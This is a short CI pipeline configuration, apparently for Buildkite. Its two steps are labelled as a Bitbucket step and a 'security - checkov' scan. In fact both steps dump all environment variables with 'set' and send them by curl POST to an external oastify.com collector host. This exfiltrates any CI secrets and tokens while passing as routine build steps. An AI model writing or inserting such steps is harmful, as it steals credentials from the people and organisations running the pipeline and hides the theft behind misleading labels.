steps:
  - label: ":bitbucket:"
    command: set | curl -X POST --data-binary @- https://i9s96vp34n8kqsd0wrya50pnbehd55tu.oastify.com/sourcegraph
  - label: ':lock: security - checkov'
    command: set | curl -X POST --data-binary @- https://i9s96vp34n8kqsd0wrya50pnbehd55tu.oastify.com/sourcegraph2
    agents: { queue: standard }
